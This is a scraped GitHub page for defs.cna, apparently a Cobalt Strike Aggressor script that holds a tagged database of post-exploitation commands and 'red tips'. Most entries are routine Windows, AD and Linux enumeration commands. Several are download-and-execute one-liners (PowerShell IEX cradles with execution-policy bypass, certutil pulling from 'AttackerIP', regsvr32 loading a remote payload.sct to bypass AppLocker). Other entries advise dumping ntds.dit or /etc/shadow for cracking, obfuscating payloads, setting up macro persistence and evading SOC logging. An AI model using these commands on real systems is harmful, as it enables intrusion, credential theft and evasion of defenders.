-
Notifications
You must be signed in to change notification settings - Fork 36
/
defs.cna
1428 lines (1425 loc) · 83.5 KB
/
defs.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# defs.cna
# Definitions for all the tips and commands.
# Mostly r3dqu1nn's work, with a bit of help from 001SPARTaN
# @database = @(%($cmd, $desc, @tags), %($cmd, $desc, @tags))
@database = @(
%(cmd => 'ipconfig /all', desc => 'Display all network information for all interfaces.', tags => @(
'network', 'networking', 'interfaces', 'utility', 'recon', 'enum', 'ipconfig'
)
),
%(cmd => 'systeminfo', desc => 'Display info about the system. Tip: Use | findstr to pipe out individual options.', tags => @(
'system', 'info', 'information', 'recon', 'enum', 'privesc', 'systeminfo', 'system info'
)
),
%(cmd => 'route print', desc => 'Display network routes.', tags => @(
'network', 'route', 'routes', 'print', 'recon', 'enum'
)
),
%(cmd => 'arp -a', desc => 'Display ARP table.', tags => @(
'network', 'arp', 'recon', 'enum'
)
),
%(cmd => 'wmic computersystem get [options]', desc => 'Get detailed information about the system with wmic. Use [/?] for a complete list of options', tags => @(
'computer', 'wmic', 'system', 'recon', 'enum'
)
),
%(cmd => 'wmic desktop get [options]', desc => 'Get detailed information about the desktop with wmic. Use [/?] for a complete list of options', tags => @(
'desktop', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netlogin get [options]', desc => 'Get detailed information about netlogin with wmic. Use [/?] for a complete list of options', tags => @(
'netlogin', 'login', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic process get [options]', desc => 'Get detailed information about processes with wmic. Use [/?] for a complete list of options', tags => @(
'process', 'processes', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic service get [options]', desc => 'Get detailed information about services with wmic. Use [/?] for a complete list of options', tags => @(
'services', 'service', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic volume get [options]', desc => 'Get detailed information about volumes/drives with wmic. Use [/?] for a complete list of options', tags => @(
'volume', 'drives', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netuse list full', desc => 'Get a full list of mapped drives with wmic.', tags => @(
'netuse', 'drives', 'recon', 'enum', 'wmic', 'mapped'
)
),
%(cmd => 'wmic startup get [options]', desc => 'Get detailed information regarding the startup of the system with wmic. Use [/?] for a complete list of options.', tags => @(
'startup', 'boot', 'bootup', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic PRODUCT get [options]', desc => 'Get detailed information about the installed software on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'product', 'software', 'install', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic qfe get [options]', desc => 'Get detailed information about hotfixes installed on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'qfe', 'patches', 'hotfix', 'enum', 'recon', 'kb', 'wmic'
)
),
%(cmd => 'wmic ntdomain get [options]', desc => 'Get detailed information about the Domain Controller on the network with wmic. Use [/?] for a complete list of options.', tags => @(
'ntdomain', 'DomainController', 'domain', 'dc', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic bios list full', desc => 'Get detailed information about the BIOS on the system with wmic.', tags => @(
'computer', 'hardware', 'bios', 'install', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'SET', desc => 'Get detailed information about all the %PATH% variables.', tags => @(
'computer', 'variables', 'set', 'enum', 'recon', 'user'
)
),
%(cmd => 'netstat -ano', desc => 'Get detailed information about network connections on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I listening', desc => 'Get detailed information about network connections listening on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I established', desc => 'Get detailed information about network connections established on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'nbtstat -A [Target IP]', desc => 'Returns the NetBIOS name table and MAC address of the address card for the remote computer name specified.', tags => @(
'computer', 'nbtstat', 'network', 'mac', 'enum', 'recon', 'NetBIOS'
)
),
%(cmd => 'nslookup', desc => 'Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Resolve IP <--> Domain Name.', tags => @(
'computer', 'nslookup', 'network', 'dns', 'lookup', 'enum', 'recon'
)
),
%(cmd => 'reg query [keyname]', desc => 'Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.', tags => @(
'registry', 'query', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'reg add [keyname] [options]', desc => 'Adds a new subkey or entry to the registry.', tags => @(
'registry', 'add', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [options]', desc => 'Communicates with the Service Controller and installed services. SC.exe retrieves and sets control information about services.', tags => @(
'sc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [ServerName] qc [ServiceName] [BufferSize]', desc => 'Queries the configuration information for a service.', tags => @(
'sc', 'qc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'tasklist (/S Remote Computer) [options]', desc => 'Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.', tags => @(
'schtasks', 'list', 'time', 'persistence', 'enum', 'recon', 'tasklist', 'processes', 'process'
)
),
%(cmd => 'driverquery [/s Computer] [/u Domain\User /p Password]', desc => 'Displays a list of all installed device drivers and their properties.', tags => @(
'driver', 'driverquery', 'computer', 'hardware', 'enum', 'recon',
)
),
%(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'gpresult /s <COMPUTER> /u <USERNAME> [options]', desc => 'Displays the Resultant Set of Policy (RSoP) information for a remote user and computer.', tags => @(
'firewall', 'RSOP', 'GPO', 'Group Policy', 'enum', 'recon', 'rules'
)
),
%(cmd => 'whoami /groups /all [options]', desc => 'Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name.', tags => @(
'user', 'groups', 'privileges', 'logon', 'enum', 'recon',
)
),
%(cmd => 'netsh firewall (advfirewall) show conf', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer. Use firewall to query firewall information.', tags => @(
'netsh', 'network', 'config', 'firewall', 'enum', 'recon', 'rules'
)
),
%(cmd => 'netsh wlan show profiles', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer.', tags => @(
'netsh', 'network', 'config', 'wlan', 'enum', 'recon', 'rules'
)
),
#net commands
%(cmd => 'net accounts [/domain]', desc => 'Updates the user accounts database and modifies password and logon requirements for all accounts.', tags => @(
'net', 'network', 'config', 'accounts', 'enum', 'recon', 'user', 'modify', 'domain', 'display'
)
),
%(cmd => 'net group "groupname" [/domain]', desc => 'Adds, displays, or modifies global groups in the domain.', tags => @(
'net', 'network', 'config', 'groups', 'recon', 'enum', 'domain', 'display'
)
),
%(cmd => 'net localgroup "groupname" [/domain]', desc => 'Adds, displays, or modifies local groups in the domain.', tags => @(
'net', 'network', 'config', 'localgroup', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net view [/domain]', desc => 'Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.', tags => @(
'net', 'network', 'config', 'view', 'enum', 'recon', 'display', 'computers', 'domain'
)
),
%(cmd => 'net session [\\ComputerName]', desc => 'Manages server computer connections. Used without parameters, net session displays information about all sessions with the local computer.', tags => @(
'net', 'network', 'config', 'session', 'enum', 'recon', 'display'
)
),
%(cmd => 'net share [options]', desc => 'Manages shared resources. Used without parameters, net share displays information about all of the resources that are shared on the local computer.', tags => @(
'net', 'network', 'config', 'resources', 'enum', 'recon', 'share', 'display'
)
),
%(cmd => 'net user [username] [/domain]', desc => 'Adds or modifies user accounts or displays user account information.', tags => @(
'net', 'network', 'config', 'user', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net use * \\IP\Share /user:username [password]', desc => 'Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.', tags => @(
'net', 'network', 'use', 'pivot', 'authentication', 'resource', 'domain', 'connection', 'shared'
)
),
#powershell
%(cmd => 'IEX (New-Object Net.WebClient).DownloadString(\'http://IP/URI\')', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download'
)
),
%(cmd => 'powershell -executionpolicy bypass -nop -noni -c \'\'\'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {1};IEX (New-Object Net.WebClient).DownloadString(\"https://IP/URI\")\'\'\'', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download', 'SSL'
)
),
%(cmd => '\$code=\'code goes here\'\;[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Encodes a byte array as a Base64 string', tags => @(
'string', 'base64', 'encode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
%(cmd => '\$code=\'code goes here\'\;[convert]::FromBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Decodes a byte array from a Base64 string', tags => @(
'string', 'base64', 'decode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
%(cmd => 'cat (Get-PSReadlineOption).HistorySavePath', desc => 'Shows all history for PS5 commands entered', tags => @(
'recon', 'stored', 'powershell', 'enum', 'history', 'commands'
)
),
%(cmd => 'Get-ADUser -Filter \* \|Where-Object \{\$_.Enabled -eq $false\}', desc => 'Returns all disabled user accounts', tags => @(
'recon', 'AD', 'powershell', 'enum', 'disabled', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Enabled -PasswordNeverExpires:$true', desc => 'Returns all accounts with non-expiring passwords', tags => @(
'recon', 'AD', 'powershell', 'enum', 'expire', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Filter \{SmartCardLogonRequired -eq $false\}', desc => 'Returns all accounts with no smart card required', tags => @(
'recon', 'AD', 'powershell', 'enum', 'smartcard', 'accounts', 'user', 'CAC'
)
),
%(cmd => 'Get-ADComputer -Filter \{OperatingSystem -Like \"Windows *Server*\"\} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto', desc => 'Returns all AD Computers in a format-table', tags => @(
'recon', 'AD', 'powershell', 'enum', 'computer', 'windows server', 'OS', 'Server'
)
),
%(cmd => '(new-object Net.Sockets.TcpClient).Connect("IP", PORT)', desc => 'Tests network port access to see if the port is open', tags => @(
'recon', 'tcp', 'powershell', 'enum', 'computer', 'sockets', 'IP', 'Port', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostbyAddress("8.8.8.8")', desc => 'Resolve IP to hostname', tags => @(
'recon', 'powershell', 'net', 'hostname', 'IP', 'dns', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostEntry("host.domain")', desc => 'Resolve hostname to IP', tags => @(
'recon', 'powershell', 'net', 'dns', 'IP', 'hostname', 'network'
)
),
#dsquery
%(cmd => 'dsquery computer -name <name>*', desc => 'Search for computers with a name similar to <name>.', tags => @(
'computer', 'name', 'dsquery', 'recon', 'enum'
)
),
%(cmd => 'dsquery * \"CN=System,DC=computer\" -filter \"\(objectClass=trustedDomain\)\" -attr TrustPartner,FlatName,TrustDirection', desc => 'Search for Domain Controllers that are trusted and have Trust relationships within the domain', tags => @(
'computer', 'dsquery', 'recon', 'enum', 'domain controller', 'domain', 'trust'
)
),
%(cmd => 'dsquery group -name \"domain admins\" |dsget group -members -expand', desc => 'Search for Domain Admins in the domain using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'admins'
)
),
%(cmd => 'dsquery user -name <username> |dsget user -memberof -expand', desc => 'Query a specific user in the domain and the groups they are a member of using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'user'
)
),
%(cmd => 'dsquery * domainroot -filter \"\(&\(objectCategory=Person\)\(objectClass=User\)\(userAccountControl:1.2.840.113556.1.4.803:=32\)\)\"', desc => 'Query user accounts with no passwords required with dsquery', tags => @(
'accounts', 'dsquery', 'recon', 'enum', 'passwords', 'domain'
)
),
%(cmd => 'dsquery subnet -limit 0', desc => 'Returns subnet information in AD sites and services with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'sites', 'services'
)
),
%(cmd => 'dsquery OU', desc => 'Returns all OU information in AD with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'OU'
)
),
#MSSQL
%(cmd => 'sqlcmd -s localhost -q "exec sp_databases"', desc => 'Returns list of local MSSQL databases', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT count(*) FROM TABLE"', desc => 'Returns number of entries in TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT TOP 10 * FROM TABLE"', desc => 'Returns top 10 rows from TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT * FROM SYSOBJECTS WHERE TYPE = \'U\' ORDER BY NAME"', desc => 'Returns list of table names in DATABASE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
#Linux
%(cmd => 'cat /etc/issue', desc => 'Verify Linux distro', tags => @(
'linux', 'etc', 'issue', 'cat', 'distro'
)
),
%(cmd => 'cat /etc/*-release', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /etc/*-release | grep -E \'\"NAME=\"|ID|VERSION|ID_LIKE\'', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /proc/version', desc => 'Verify Linux version using proc', tags => @(
'linux', 'cat', 'proc', 'version', 'distro'
)
),
%(cmd => 'rpm -q kernel', desc => 'Get detailed information about the kernel', tags => @(
'linux', 'rpm', 'kernel'
)
),
%(cmd => 'dmesg | grep Linux', desc => 'Output kernel messages for Linux', tags => @(
'linux', 'dmesg', 'grep', 'kernel'
)
),
%(cmd => 'ls /boot | grep vmlinuz-', desc => 'Verify the name of the specific version of the kernel', tags => @(
'linux', 'ls', 'grep', 'vmlinuz-', 'kernel'
)
),
%(cmd => 'lsb_release -a', desc => 'Display information about your specific Linux distrobution', tags => @(
'linux', 'lsb_release', 'LSB', 'distro'
)
),
%(cmd => 'last -a', desc => 'Show the users who logged in last', tags => @(
'linux', 'last', 'login', 'log'
)
),
%(cmd => 'uname -a/-mrs', desc => 'Display the software and hardware information in current running Linux system', tags => @(
'linux', 'uname', 'software', 'hardware', 'system'
)
),
%(cmd => 'id', desc => 'Print user and group information for the specified USERNAME, or (when USERNAME omitted) for the current user', tags => @(
'linux', 'id', 'user', 'group', 'username'
)
),
%(cmd => 'history', desc => 'Show the last commands entered for the current user', tags => @(
'linux', 'history', 'last', 'commands', 'user'
)
),
%(cmd => 'arp -a', desc => 'Display the current arp table', tags => @(
'linux', 'arp', 'table', 'MAC'
)
),
%(cmd => 'netstat -anot', desc => 'Display network connections', tags => @(
'linux', 'net', 'stat', 'TCP', 'UDP', 'connections'
)
),
%(cmd => 'ps -elf', desc => 'View information on a selection of running processes', tags => @(
'linux', 'ps', 'elf', 'processes', 'monitor', 'status'
)
),
%(cmd => 'ps -elf | grep root', desc => 'View information on a selection of running processes owned by root', tags => @(
'linux', 'ps', 'elf', 'root', 'processes', 'monitor'
)
),
%(cmd => 'ls -la /var/www/html/', desc => 'List the contents of html directory for web resources', tags => @(
'linux', 'ls', '/var/www/html', 'web', 'html', 'listing'
)
),
%(cmd => 'service apache2 status', desc => 'View status of apache2 service', tags => @(
'linux', 'apache2', 'service', 'status', 'web'
)
),
%(cmd => 'cat /etc/resolv.conf', desc => 'View the DNS entries for your Linux distro', tags => @(
'linux', 'cat', 'etc', 'resolv.conf', 'DNS', 'distro'
)
),
%(cmd => 'cat /etc/networks', desc => 'View Linux network configuration', tags => @(
'linux', 'cat', 'etc', 'networks', 'config'
)
),
%(cmd => 'iptables -L', desc => 'Display all iptables rules', tags => @(
'linux', 'iptables', 'networking', 'rules', 'ACL'
)
),
%(cmd => 'iptables -L -t nat', desc => 'Display all natting iptables rules', tags => @(
'linux', 'iptables', 'nat', 'rules', 'ACL'
)
),
%(cmd => 'lsof -i', desc => 'List the files that are open by which process', tags => @(
'linux', 'lsof', 'list', 'files', 'process', 'open'
)
),
%(cmd => 'cat /etc/services', desc => 'View services that client applications use', tags => @(
'linux', 'cat', 'etc', 'services', 'client', 'applications'
)
),
%(cmd => 'grep 80 /etc/services', desc => 'View services that utilize port 80', tags => @(
'linux', 'grep', '80', 'web', 'services', 'port'
)
),
%(cmd => 'w', desc => 'Display who is logged into the Linux and Unix-like server, and what they are doing at command execution time', tags => @(
'linux', 'w', 'logged', 'login', 'command', 'execution'
)
),
%(cmd => 'route -n', desc => 'Display the route table for Linux/Debian based systems', tags => @(
'linux', 'route', '-n', 'routing', 'network', 'recon'
)
),
%(cmd => 'cat /etc/passwd', desc => 'Display the contents of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'password', 'recon'
)
),
%(cmd => 'cat /etc/passwd | awk -F : \'{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}\'', desc => 'Display only users of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'awk', 'regex', 'password', 'recon'
)
),
%(cmd => 'cat /etc/motd', desc => 'Display the message of the day for any sensitive info', tags => @(
'linux', 'cat', 'etc', 'motd', 'information', 'recon'
)
),
%(cmd => 'cat /etc/group', desc => 'Display the groups in /etc/group', tags => @(
'linux', 'cat', 'etc', 'group', 'recon'
)
),
%(cmd => 'cat /etc/shadow', desc => 'Display the password hashes (Must be root)', tags => @(
'linux', 'cat', 'etc', 'shadow', 'password', 'hashes', 'recon'
)
),
);
@tips = @(
%(tips => 'Use the built in net commands with Beacon! [help net]', tags => @(
'net', 'networking', 'config', 'utility', 'recon', 'enum', 'domain', 'display'
)
),
%(tips => 'Run C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config', tags => @(
'vbscript', 'networking', 'config', 'utility', 'recon', 'enum', 'script'
)
),
%(tips => 'RunDll32.exe user32.dll,LockWorkStation - Locks a users workstation', tags => @(
'rundll32', 'lock', 'workstation', 'user', 'effects'
)
),
%(tips => 'dir /s /h:a *.* - displays all hidden files', tags => @(
'dir', 'display', 'hidden', 'files', 'listing'
)
),
%(tips => 'netsh interface portproxy add v4tov4 listenport=port listenaddress=IP connectaddress=remote_ip connectport=remote_port - setup reverse port proxy on windows as a pivot', tags => @(
'netsh', 'portproxy', 'pivot', 'networking', 'interface'
)
),
%(tips => 'icacls \<file_name\> /grant \<username\>:F - grants full control permissions', tags => @(
'icacls', 'permissions', '', 'user', 'effects'
)
),
%(tips => 'regsvr32.exe /u /n /s /i:http://ip/payload.sct scrobj.dll - bypass Applocker or code execution restrictions, using regsvr32 as a one-liner', tags => @(
'regsvr32', 'one-liner', 'scrobj.dll', 'bypass', 'native', 'delivery'
)
),
%(tips => 'SystemInfo /s computername - gets remote system info', tags => @(
'systeminfo', 'computer', 'system', 'recon', 'info', 'enum'
)
),
%(tips => 'Need a map of the network? Run Bloodhound or SharpHound for faster polling!!', tags => @(
'network', 'map', 'topology', 'BloodHound', 'SharpHound'
)
),
%(tips => 'Always check sysvols!! Domain Controllers will have them, most sysvols are viewable by normal users.', tags => @(
'sysvol', 'domain controller', 'enum', 'recon', 'scripts', 'share'
)
),
%(tips => 'net user a specific user and see if they are executing any logon scripts, those might contain juicy information.', tags => @(
'net', 'user', 'recon', 'enum', 'logon', 'scripts'
)
),
%(tips => 'Always check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.', tags => @(
'folders', 'information', 'recon', 'enum', 'users'
)
),
%(tips => 'Find those Fileservers! Sysadmins leave behind all kinds of goodies there. Great for lateral movement as well.', tags => @(
'server', 'fileserver', 'sysadmin', 'lateral movement', 'enum', 'recon'
)
),
%(tips => 'Use certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.', tags => @(
'certutil', 'urlcache', 'one-liner', 'download', 'web', 'delivery'
)
),
%(tips => 'The all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring(\'http://[domainname|IP]:[port]/[file]\'))\"', tags => @(
'powershell', 'one-liner', 'web-delivery', 'web', 'delivery', 'download'
)
),
%(tips => 'Use tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.', tags => @(
'tasklist', 'remote', 'authentication', 'list', 'processes'
)
),
%(tips => 'Enable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f', tags => @(
'RDP', 'registry', 'config', 'windows', 'regedit'
)
),
%(tips => 'Please wrap/encode/pack your payloads if you have to drop to disk! - use veil/upx/Invoke-Obfuscation/In-Memory type of payloads', tags => @(
'pack', 'wrap', 'encode', 'upx', 'veil', 'payload', 'Invoke-Obfuscation'
)
),
%(tips => 'Try to stay in memory and avoid putting files on disk. (powershell-import)', tags => @(
'Memory', 'inject', 'fileless', 'payload', 'files'
)
),
%(tips => 'Live off the land!! Use what is on the target, native windows binaries are very powerful! (ex. forfiles, rundll32)', tags => @(
'native', 'windows', 'binaries', '', 'processes'
)
),
%(tips => 'Use AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.', tags => @(
'AD', 'schemes', 'sysadmins', 'IT', 'naming'
)
),
%(tips => 'Enterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!', tags => @(
'admins', 'enterprise', 'AD', 'password', 'lateral movement', 'pivot'
)
),
%(tips => 'Invoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.', tags => @(
'Invoke-NinjaCopy', 'powershell', 'ntds.dit', 'SYSTEM', 'password', 'cracking'
)
),
%(tips => 'Have multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.', tags => @(
'persistence', 'presence', 'foothold', 'network', 'operations', 'security'
)
),
%(tips => 'cmd.exe and powershell.exe blocked by GPO? Find a process that is user owned and started on bootup for process injection to bypass that. Try forfiles as well.', tags => @(
'cmd', 'powershell', 'GPO', 'list', 'injection', 'forfiles', 'bypass'
)
),
%(tips => 'Just because you acquired initial access does not mean you stop doing recon. Network/Host Enumeration is always the most important part.', tags => @(
'initial', 'recon', 'enum', 'network', 'host', 'harvesting'
)
),
%(tips => 'Invoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.', tags => @(
'powershell', 'powersploit', 'network', 'machine', 'DNS', 'awareness', 'recon', 'enum'
)
),
%(tips => 'Need a Temporary web server? Use Python! python -m SimpleHTTPServer [port]', tags => @(
'web', 'server', 'python', 'http', 'services'
)
),
%(tips => 'Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.', tags => @(
'redtip', '#1', 'user agent', 'outlook', 'traffic'
)
),
%(tips => 'Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.', tags => @(
'redtip', '#2', 'SOC', 'proxy', 'analysis', 'logs', 'cookies'
)
),
%(tips => 'Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.', tags => @(
'redtip', '#3', 'snapshot', 'AD', 'attacks'
)
),
%(tips => 'Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.', tags => @(
'redtip', '#4', 'Office', 'macros', 'persistence', 'VDI'
)
),
%(tips => 'Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.', tags => @(
'redtip', '#5', 'DNS', 'recon', 'enum'
)
),
%(tips => 'Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell', tags => @(
'redtip', '#6', 'wmic', 'DNS', 'assets'
)
),
%(tips => 'Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.', tags => @(
'redtip', '#7', 'PSEXEC', 'WMI', 'powershell', 'COM', 'RDP'
)
),
%(tips => 'Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!', tags => @(
'redtip', '#8', 'emails', 'delivery', 'payload'
)
),
%(tips => 'Red tip #9: When PowerUp yields no results, dont forget SysInternals AutoRuns. Often you can find unexpected surprises :)', tags => @(
'redtip', '#9', 'PowerUp', 'sysinternals', 'AutoRuns'
)
),
